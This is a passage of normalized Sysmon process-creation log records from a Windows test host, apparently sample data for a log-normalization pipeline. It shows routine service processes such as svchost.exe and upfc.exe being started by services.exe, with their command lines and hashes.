"object.process.id": "1640", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.402Z", "type": "raw", "uuid": "c6acf4de-6376-4695-b99b-5b85cdc004c5"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5403388Z\"},\"EventRecordID\":\"27501\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00108b0a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1624\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00108b0a0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1624", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.399Z", "type": "raw", "uuid": "ae086f39-0de7-459e-b369-d9a1c897c64e"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5368260Z\"},\"EventRecordID\":\"27500\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.398\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010550a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1616\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s EventSystem\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s EventSystem", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010550a0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1616", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.398Z", "type": "raw", "uuid": "8a32e5f5-684a-48c2-bf51-ffc3cd25549d"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5075999Z\"},\"EventRecordID\":\"27496\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.344\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001055010100}\"},{\"Name\":\"ProcessId\",\"text\":\"1536\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k NetworkService -p -s Dnscache\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k NetworkService -p -s Dnscache", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001055010100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1536", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.344Z", "type": "raw", "uuid": "69087092-8add-4674-be78-45440f92ccb7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.3031689Z\"},\"EventRecordID\":\"27492\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.316\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010edfc0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1500\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p -s NlaSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p -s NlaSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010edfc0000", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1500", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.316Z", "type": "raw", "uuid": "7629abf1-f1a4-4362-8a01-e65a33ffc5e6"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.1580427Z\"},\"EventRecordID\":\"27488\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.190\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00107df10000}\"},{\"Name\":\"ProcessId\",\"text\":\"1380\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\upfc.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Updateability From SCM\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"upfc.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=D35A6D77ACF8E9AC80E345BDE15032AE632A976D,MD5=AC3DA8AAC02C94DC65ECDF9548E6372D,SHA256=AE4B0E81C601521DA974D53E44295C98331CED7C9CC2F260434E6BC0C475DDA3,IMPHASH=B3371ED99D25FEFF460973E2D1E5A076\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\upfc.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00107df10000", "object.process.hash.imphash": "B3371ED99D25FEFF460973E2D1E5A076", "object.process.hash.md5": "AC3DA8AAC02C94DC65ECDF9548E6372D", "object.process.hash.sha1": "D35A6D77ACF8E9AC80E345BDE15032AE632A976D", "object.process.hash.sha256": "AE4B0E81C601521DA974D53E44295C98331CED7C9CC2F260434E6BC0C475DDA3", "object.process.id": "1380", "object.process.meta": "Description:Updateability From SCM | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "upfc.exe", "object.process.original_name": "upfc.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.190Z", "type": "raw", "uuid": "f3ae18b2-9d7f-4291-bede-6f4e29542d38"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.6036170Z\"},\"EventRecordID\":\"27483\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.161\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00104fee0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1360\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 